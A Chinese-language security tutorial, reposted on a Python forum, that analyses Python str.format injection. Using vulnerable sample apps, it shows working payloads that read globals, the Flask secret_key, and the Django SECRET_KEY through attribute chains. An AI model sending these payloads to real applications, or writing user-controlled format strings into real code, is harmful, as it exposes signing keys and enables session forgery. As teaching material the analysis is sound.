注册    登录
创作新主题
社区所有版块导航
Python
python开源   Django   Python   DjangoApp   pycharm  
DATA
docker   Elasticsearch  
分享
问与答   闲聊   招聘   翻译   创业   分享发现   分享创造   求职   区块链   支付之战  
aigc
aigc   chatgpt  
WEB开发
linux   MongoDB   Redis   DATABASE   NGINX   其他Web框架   web工具   zookeeper   tornado   NoSql   Bootstrap   js   peewee   Git   bottle   IE   MQ   Jquery  
机器学习
机器学习算法  
Python88.com
反馈   公告   社区推广  
产品
短视频  
印度
印度  
一周十大热门主题
D20访谈直播预约!阿里AIGC大会“云参与”
一个回车符搞崩Git,甚至能触发远程代码执行?
8 个 Python 库,再也不需要自己编写脚本了
AI商业洞察 | 比亚迪与香港科技大学成立具身智能联合实验室;上海19所高校开设AI专业;LGND ...
这篇Reddit帖子很火🔥——ChatGPT 解决了医生十多年-20250709214725
加冕时刻丨2025第十三届TopDigital创新营销奖获奖企业捷报
前端死在了 Python 朋友的嘴里?他用 Python 写了个交互式数据看板,没碰一行 JavaS...
阿里千问悄悄上线 ChatGPT 平替:Qwen Chat 桌面版,MCP 功能真香!
我天,MySQL 已沦为老二,彻底被 PostgreSQL 反超……
不止AlphaFold,「药界ChatGPT」横空出世!华人女投资人深度揭秘
关注
Py学习  »  Python

python格式化字符串研究

合天智汇 • 5 年前 • 481 次点击  

前言

与队友交流时提及python的格式化字符串漏洞,这个漏洞之前接触不多,所以写篇文章从基础部分仔细研究了研究。python环境是python3.7。

Python3里的格式化字符串

python3中的格式化字符串主要有以下两种形式:

"test %s" % ('test')"test {0}".format('test')


这两个语句的输出都是test test。虽然效果一样,但是在python web的开发中一般认为前者比后者要安全,因为后者可能会因为自身支持的一些特殊用法导致配置信息等的泄露。

首先,format形式的格式化字符串基本用法如下:

"I am {1},he is {0}".format("a","b")


这个语句的输出是I am b,he is a,大括号{}中的数字代表了format的变量顺序。

"I am {MyName},he is {HisName}".format(MyName="aa",HisName="bb")


这个语句的输出是I am aa,he is bb,这种语句可以在format函数的参数通过key来赋值。

"I am {},he is {}".format("a","b")


这个语句的输出是I am a,he is b,这样的用法会让大括号与format的参数一一对应。

当大括号与format的参数不能一一对应的时候便会报错,例如:

"I am {0},he is also {0}".format('a')"I am {0},he is also {1}".format('a')


前者会输出I am a,he is also a,而后者会报错tuple index out of range

这些format函数的基本用法并不是导致格式化字符串漏洞的根源,查看下列代码:

"first {0[1]}, second {0}".format(['a','b'])


输出为first b, second ['a', 'b'],可见当format函数的参数是一个列表时,可以通过用方括号添加索引的方式来获取列表的值。同样的,这种用法也可以用在类的属性上,比如以下代码会输出字符串a的内置属性__class__:

print("{0.__class__}".format('a'))

输出结果是

一般利用

python的格式化字符串的利用与沙盒逃逸或者python SSTI很相似,但format与后两者的区别在于它只能读取属性而不能执行方法,这就限制了格式化字符串的利用与攻击链的构造。举个例子,python SSTI中可以通过'a'.__class__.__base__.__subclasses__()[12]来获取任意类,但是由于format函数无法执行__subclasses__()这样的方法,直接把这种payload套进格式化字符串的利用中会报错type object 'object' has no attribute '__subclasses__()'

在与队友讨论时我们用的测试代码简化如下:

from secret.secret import secret

class AppendStr(object):    def __init__(self, message = 'test'):        self.message = message
    def __str__(self):        return self.message
def test():    s = input("test\n")    t = s + " by the way {0}"    print(t.format(AppendStr()))
while(1):    test()

可以看到这里format函数的参数是一个对象的实例,而secret保存在全局变量中。熟悉SSTI或者沙箱绕过的都知道,python的函数类有一个内置属性__globals__可以以字典的形式返回函数所在的全局命名空间所定义的全局变量。结合format函数的格式化字符串可以读取成员属性的特性,我们很容易知道只需通过一个调用链来获取一个函数类并读取它的__globals__属性即可。这里我们可以使用这样的payload:{0.__class__.__init__.__globals__}。由于AppendStr类定义了__init__函数,所以可以通过{0.__class__.__init__}来获取一个函数类,再读取这个类的__globals__属性来获取secret。这个思路也适用于一切的类的成员函数,假如把测试代码改为如下:





    
def test():    s = input("test\n")    t = s + " by the way {0}"    print(t.format('test'))
while(1):    test()


如果机械地套用上边的payload会报错'wrapper_descriptor' object has no attribute '__globals__'。可以通过以下代码来查看字符串类的成员属性:

print('a'.__class__.__dict__)

输出很多这里就不一一列举了。可以在输出的结果中看到字符串类并没有function类型的成员属性,所以不能通过格式化字符串来获得全局变量。

Flask下读取secret_key

把情景切换到flask下写出如下的测试代码

from flask import Flaskfrom flask import request

app = Flask(__name__)app.config['SECRET_KEY'] = 'gasidfjbodnjgfnof'
class AppendStr(object):    def __init__(self, message = 'test'):        self.message = message
    def __str__(self):        return self.message

@app.route('/', methods=['GET'])def index():    template = 'Hello {0}, This is your email: ' + request.args.get('email')    return template.format(AppendStr())

if __name__ == '__main__':    app.run('0.0.0.0', 8080)


前置步骤与之前讲的相似,get方法提交参数?email={0.__class__.__init__.__globals__}可以看到当前的全局变量,然而secret_key并不会出现在返回中。我本地测试时返回的是这些数据:

似乎不能简单粗暴地通过这个payload来获取secret_key,我们再看看flask的代码app.py:

# 部分包及代码省略from .config import Config, ConfigAttribute
class Flask(_PackageBoundObject):# 注释省略  config_class = Config    testing = ConfigAttribute('TESTING')      secret_key = ConfigAttribute('SECRET_KEY')        session_cookie_name = ConfigAttribute(


    
'SESSION_COOKIE_NAME')


可以看到Flask类的属性secret_key会保存当前的secret_key的值,而上边返回的全局变量里有'app': 。我这个文件名是template,这就是当前的Flask类实例化的对象。所以只需要在上边那个payload后补充一些东西就能拿到secret_key,其内容如下:?email={0.__class__.__init__.__globals__[app].secret_key}

django下读取SECRET_KEY

p师傅很早以前写过一篇文章讲解过这个利用方法,其链接如下:https://www.leavesongs.com/PENETRATION/python-string-format-vulnerability.html。p师傅在文章中给出了两个payload,但并没有仔细讲解其原理。所以我这里就逐步分析下其中一个payload的构造,另一个payload思路类似。测试代码如下:

from django.http import HttpResponse

def index(request):    template = 'Hello {user}, This is your email: ' + request.GET.get('email')    return HttpResponse(template.format(user=request.user))


在未登录状态下,request.user是类AnonymousUser的实例化对象,类定义在django/contrib/auth/models.py文件中395行:



402行看到该对象的_groups属性是一个EmptyManager类的对象。429行可知该对象的groups方法也被转化为了名为groups且值与_groups相同的类属性。EmptyManager类定义在django/db/models/manager.py的195行

可以看到这个对象的model属性是与AnonymousUser类定义在同一个文件中的Group类,在django/contrib/auth/models.py文件中91行:

Group类本身定义的东西没什么好看的,一路跟随至其父类的父类ModelBase,定义在django/db/models/base.py的71行,有):

在121行可以看到该类的_meta属性是一个Options类实例化的对象。跟踪至django/db/models/options.py的65行可以看到类定义(此处由于代码太长不截图了):

from django.apps import apps# 省略

class Options:# 省略    default_apps = apps        def __init__(self, meta, app_label=None):    self.app_label = app_label        self.apps = self.default_apps# 省略    @property    def app_config(self):        # Don't go through get_app_config to avoid triggering imports.        return self.apps.app_configs.get(self.app_label)# 省略

可以看到app_config方法被转化为了只读属性,而该属性返回 self.apps.app_configs.get(self.app_label)。审计代码可以清楚得发现self.apps就是导入的apps模块,即一个module类的对象。跟踪至django/apps/registry.py,可以看到类Apps的定义里,即原文件13行有

class Apps:  def __init__(self, installed_apps=()):        self.app_configs = {}# 省略    def populate(self, installed_apps=None):# 省略                for entry in installed_apps:                if isinstance(entry, AppConfig):                    app_config = entry                else:                    app_config = AppConfig.create(entry) # 91行                if app_config.label in self.app_configs:                    raise ImproperlyConfigured(                        "Application labels aren't unique, "                        "duplicates: %s" % app_config.label)
                self.app_configs[app_config.label] = app_config # 97行

跟踪91行的AppConfig.create至django/apps/config.py,有:

class AppConfig:# 省略    def create(cls, entry):        try:            module = import_module(entry)

这个Options类实例化的对象的app_config属性返回会返回一个对象,而这个对象的module属性是python的一个模块即module。而对于我的测试代码这种情景,module的内容为。查看该模块的代码,可以在文件django/contrib/auth/admin.py中看到

from django.conf import settings# 省略

settings模块里就有我们需要的SECRET_KEY。故我们可以通过简单的模块包含关系利用格式化字符串漏洞来读取SECRET_KEY,故最终payload如下:[{user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY}]

点击“阅读原文”,Python编程指南:http://www.hetianlab.com/cour.do?w=1&c=C172.19.104.182015082711022000001







点击阅读原文做实验

干货精选:2019原创干货集锦 | 掌握学习主动权

了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!



看都看完了,还不点这里试试


Python社区是高质量的Python/Django开发社区
本文地址:http://www.python88.com/topic/55391
Reply
 
481 次点击  
登录后回复
关于   移动版
Py学习 - 专注于Python技术发展的社区(原Django社区)
沪ICP备11025650号